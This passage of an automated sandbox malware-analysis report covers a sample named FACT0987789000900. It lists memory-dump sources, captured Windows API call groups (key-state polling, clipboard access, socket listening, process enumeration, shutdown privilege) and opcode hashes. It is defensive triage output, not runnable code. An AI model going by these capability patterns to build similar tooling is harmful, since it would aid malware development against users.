                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: State$Async$Keyboard
                                                                                                                • String ID:
                                                                                                                • API String ID: 541375521-0
                                                                                                                • Opcode ID: 42a1b309f92877b970ee9dc3241ea7a47f6e9c0e49e88085ed06294d5799be4e
                                                                                                                • Instruction ID: 44864742f4a197eb6f4d0c06043a98a7051002e00c0403dfd2e1328c56ac37d7
                                                                                                                • Opcode Fuzzy Hash: 42a1b309f92877b970ee9dc3241ea7a47f6e9c0e49e88085ed06294d5799be4e
                                                                                                                • Instruction Fuzzy Hash: AE41D634514BC96DFF319B608A243ABBEA16B31704F04805BD5C6563C2DBDC9DC8C7AA
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1737998785-0
                                                                                                                • Opcode ID: f7a882ff700bea320c13f5d5a83d49f58311ffcad6a9f8d732d72eaa771a91b4
                                                                                                                • Instruction ID: 76b3148235b7a6311779cae7b802249f661695c1c397c8bf03d168b3de160066
                                                                                                                • Opcode Fuzzy Hash: f7a882ff700bea320c13f5d5a83d49f58311ffcad6a9f8d732d72eaa771a91b4
                                                                                                                • Instruction Fuzzy Hash: 6721B135300110AFDB00AF26DC49FAE77A8EF24761F01C41AF906DB2A1DB78EC019B69
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004C9ABF: CLSIDFromProgID.COMBASE ref: 004C9ADC
                                                                                                                  • Part of subcall function 004C9ABF: ProgIDFromCLSID.COMBASE(?,00000000), ref: 004C9AF7
                                                                                                                  • Part of subcall function 004C9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 004C9B05
                                                                                                                  • Part of subcall function 004C9ABF: CoTaskMemFree.COMBASE(00000000), ref: 004C9B15
                                                                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 004EC235
                                                                                                                • _memset.LIBCMT ref: 004EC242
                                                                                                                • _memset.LIBCMT ref: 004EC360
                                                                                                                • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 004EC38C
                                                                                                                • CoTaskMemFree.COMBASE(?), ref: 004EC397
                                                                                                                Strings
                                                                                                                • NULL Pointer assignment, xrefs: 004EC3E5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                • String ID: NULL Pointer assignment
                                                                                                                • API String ID: 1300414916-2785691316
                                                                                                                • Opcode ID: fded29e81bfbec1bb7620fc672d0d75e5839801de133a7521a5181d11693007b
                                                                                                                • Instruction ID: 90442a075211d5c3e4cc317d7e53f05da0d9afe04e89727a76583fd663e07784
                                                                                                                • Opcode Fuzzy Hash: fded29e81bfbec1bb7620fc672d0d75e5839801de133a7521a5181d11693007b
                                                                                                                • Instruction Fuzzy Hash: E2916E71D00218ABDF10DF96DC91EDEBBB8EF04314F10816AF915A7281EB746A45CFA4
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 004D13DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen
                                                                                                                • String ID: ($AddRef$InterfaceDispatch$QueryInterface$Release$|
                                                                                                                • API String ID: 1659193697-2318614619
                                                                                                                • Opcode ID: 57933fa3ca710fd77b53b47ec8e1c529aa0c3752ebcc8393bfe12e5f5fd188da
                                                                                                                • Instruction ID: 966c8281375752caf2863845cebb76a4e5bf78c0b2ad94a1e7458100de8b8eb9
                                                                                                                • Opcode Fuzzy Hash: 57933fa3ca710fd77b53b47ec8e1c529aa0c3752ebcc8393bfe12e5f5fd188da
                                                                                                                • Instruction Fuzzy Hash: 1C323575A00705AFC728CF69D490AAAB7F0FF48310B11C56EE89ADB3A1E774E941CB44
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004AB34E: GetWindowLongW.USER32(?,000000EB), ref: 004AB35F
                                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 0050016D
                                                                                                                • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0050038D
                                                                                                                • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 005003AB
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?), ref: 005003D6
                                                                                                                • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 005003FF
                                                                                                                • ShowWindow.USER32(00000003,00000000), ref: 00500421
                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 00500440
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$MessageSend$DialogInvalidateLongMetricsMoveNtdllProc_RectShowSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 2922825909-0
                                                                                                                • Opcode ID: a07d335ce658741ada19e967d4db00153e2ac779a3e0f8f2977f4ff60753e01b
                                                                                                                • Instruction ID: 9460f90f4e6609ff636b5dc915ed300886420dfbe3a1a4b1e28cc1016c31428f
                                                                                                                • Opcode Fuzzy Hash: a07d335ce658741ada19e967d4db00153e2ac779a3e0f8f2977f4ff60753e01b
                                                                                                                • Instruction Fuzzy Hash: 3EA19A35600616EBDB19CF68C9897FEBBB1BB48701F049525ED58AA2D0D734AD60CB90
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004AB34E: GetWindowLongW.USER32(?,000000EB), ref: 004AB35F
                                                                                                                  • Part of subcall function 004AB63C: GetCursorPos.USER32(000000FF), ref: 004AB64F
                                                                                                                  • Part of subcall function 004AB63C: ScreenToClient.USER32(00000000,000000FF), ref: 004AB66C
                                                                                                                  • Part of subcall function 004AB63C: GetAsyncKeyState.USER32(00000001), ref: 004AB691
                                                                                                                  • Part of subcall function 004AB63C: GetAsyncKeyState.USER32(00000002), ref: 004AB69F
                                                                                                                • ReleaseCapture.USER32 ref: 004FED48
                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 004FEDF0
                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 004FEE03
                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?), ref: 004FEEDC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                • API String ID: 973565025-2107944366
                                                                                                                • Opcode ID: 5588a1d4ef016d1e60861e72972e77205800dfa8ced4388745564222eb361d62
                                                                                                                • Instruction ID: 768f79b0aa6bfaf678d9a3026d80fa4632a87684124abfc24d15615919dca2a8
                                                                                                                • Opcode Fuzzy Hash: 5588a1d4ef016d1e60861e72972e77205800dfa8ced4388745564222eb361d62
                                                                                                                • Instruction Fuzzy Hash: EA51CD70104304AFD710DF25DC9AFAA7BE4FB98309F00492EF695972E2DB749908DB56
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004CB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004CB180
                                                                                                                  • Part of subcall function 004CB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004CB1AD
                                                                                                                  • Part of subcall function 004CB134: GetLastError.KERNEL32 ref: 004CB1BA
                                                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 004D7A0F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                • String ID: $@$SeShutdownPrivilege
                                                                                                                • API String ID: 2234035333-194228
                                                                                                                • Opcode ID: 11428d77fb6c13860919c186791e6647cb796328335491fa6fe1cff1853e2b6b
                                                                                                                • Instruction ID: 2f9594e2275a6c088a4495c099644fff5f228801ff55cb2ef1f16f9f66d2830b
                                                                                                                • Opcode Fuzzy Hash: 11428d77fb6c13860919c186791e6647cb796328335491fa6fe1cff1853e2b6b
                                                                                                                • Instruction Fuzzy Hash: D001FC716582216BFB281764DC7AFBF73589700384F14441BFD53A23D2F9685E0181BD
                                                                                                                APIs
                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004E8CA8
                                                                                                                • WSAGetLastError.WS2_32(00000000), ref: 004E8CB7
                                                                                                                • bind.WS2_32(00000000,?,00000010), ref: 004E8CD3
                                                                                                                • listen.WS2_32(00000000,00000005), ref: 004E8CE2
                                                                                                                • WSAGetLastError.WS2_32(00000000), ref: 004E8CFC
                                                                                                                • closesocket.WS2_32(00000000), ref: 004E8D10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279440585-0
                                                                                                                • Opcode ID: 2b1993d59d7aa95be68821190df4df9c56c0f1fd8f2142051a4e003e4e917219
                                                                                                                • Instruction ID: e361ead6f05a20663da7321affe97cda473fbe2f5ab2b88748f0e0748e5edb1c
                                                                                                                • Opcode Fuzzy Hash: 2b1993d59d7aa95be68821190df4df9c56c0f1fd8f2142051a4e003e4e917219
                                                                                                                • Instruction Fuzzy Hash: 3D21E3316001009FCB10EF29CD45B6EB7B9EF59315F14815EF816A73D2CB38AD019B65
                                                                                                                APIs
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004D6554
                                                                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 004D6564
                                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 004D6583
                                                                                                                • __wsplitpath.LIBCMT ref: 004D65A7
                                                                                                                • _wcscat.LIBCMT ref: 004D65BA
                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 004D65F9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                • String ID:
                                                                                                                • API String ID: 1605983538-0
                                                                                                                • Opcode ID: 8134deeff743bb3d489402322b6c3b3437744ae02433a06716a6cd3dc149a44a
                                                                                                                • Instruction ID: 520ae4fdfab26987373b0345089fa99a1476555f995c57dc4b00834bf4657474
                                                                                                                • Opcode Fuzzy Hash: 8134deeff743bb3d489402322b6c3b3437744ae02433a06716a6cd3dc149a44a
                                                                                                                • Instruction Fuzzy Hash: 31218371900218BBDB11ABA4EC98BEEB7BCAB04300F5004EBE505D3241E7759FC5CB64
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004EA82C: inet_addr.WS2_32(00000000), ref: 004EA84E
                                                                                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 004E9296
                                                                                                                • WSAGetLastError.WS2_32(00000000,00000000), ref: 004E92B9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastinet_addrsocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 4170576061-0
                                                                                                                • Opcode ID: c04845f949bf457e255ad4c7bbd2c31c93c0477c68106d47750944405c1af218
                                                                                                                • Instruction ID: a288415ea850c1206cc66c2fd75f82ac2c31a9a2009e718373f2a9a53697ed05
                                                                                                                • Opcode Fuzzy Hash: c04845f949bf457e255ad4c7bbd2c31c93c0477c68106d47750944405c1af218
                                                                                                                • Instruction Fuzzy Hash: 2941D670600100AFDB14AF69C842E7E77EDEF58728F04845EF9569B3D2DB78AD018BA5
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 004DEB8A
                                                                                                                • _wcscmp.LIBCMT ref: 004DEBBA
                                                                                                                • _wcscmp.LIBCMT ref: 004DEBCF
                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 004DEBE0
                                                                                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 004DEC0E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                • String ID:
                                                                                                                • API String ID: 2387731787-0
                                                                                                                • Opcode ID: 429992d53e29d0c82aab3e6e6dd43eafdcbc5baeafef9d0a8528cb0b3415e1cf
                                                                                                                • Instruction ID: c001f82d3d9d3073df38357a77a4a723c4247486cea0a5b326e4ce1964048934
                                                                                                                • Opcode Fuzzy Hash: 429992d53e29d0c82aab3e6e6dd43eafdcbc5baeafef9d0a8528cb0b3415e1cf
                                                                                                                • Instruction Fuzzy Hash: 4641E2356003019FC718EF29C4A1A9AB7E4FF5A324F10451FE95A8B3A1DB39F944CB59
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                • String ID:
                                                                                                                • API String ID: 292994002-0
                                                                                                                • Opcode ID: cae2336d3064243d7c42a804ccfaa89280e12fbedeb4dfaed6bb2628365af629
                                                                                                                • Instruction ID: 4f84fe3fd92eba9c902d599bf06a08ff65adcafc28c2eb017f76bbe9974df9d5
                                                                                                                • Opcode Fuzzy Hash: cae2336d3064243d7c42a804ccfaa89280e12fbedeb4dfaed6bb2628365af629
                                                                                                                • Instruction Fuzzy Hash: D011E2313001196BEB212F26DD44E7F7BADEF50320B04452EF949DB281CF78980286A9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                • API String ID: 0-1546025612
                                                                                                                • Opcode ID: 21c962f80e8e88a16d0e61c5cf48d394715eef43d2bf38a1c5af60bd7ce87a83
                                                                                                                • Instruction ID: be90165fbdb2c2b7bb2c78ae37ec7071fc0b08fc85a8e872d382636face0070d
                                                                                                                • Opcode Fuzzy Hash: 21c962f80e8e88a16d0e61c5cf48d394715eef43d2bf38a1c5af60bd7ce87a83
                                                                                                                • Instruction Fuzzy Hash: E5926F75E0021ACBEF24CF58C8807EDBBB1BB54314F1485AAD816A7384D7799DC1CB96
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,004AE014,771B0AE0,004ADEF1,0052DC38,?,?), ref: 004AE02C
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004AE03E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                • API String ID: 2574300362-192647395
                                                                                                                • Opcode ID: 8cce6cf882eb6c83262b2dadc6d58b37974b18ed36bcebc1f6ccbd1fb097d54a
                                                                                                                • Instruction ID: 2c3c7c9e1aa9d400ce7a81c7c793386dd6a482d103e131f427d2afc98744445e
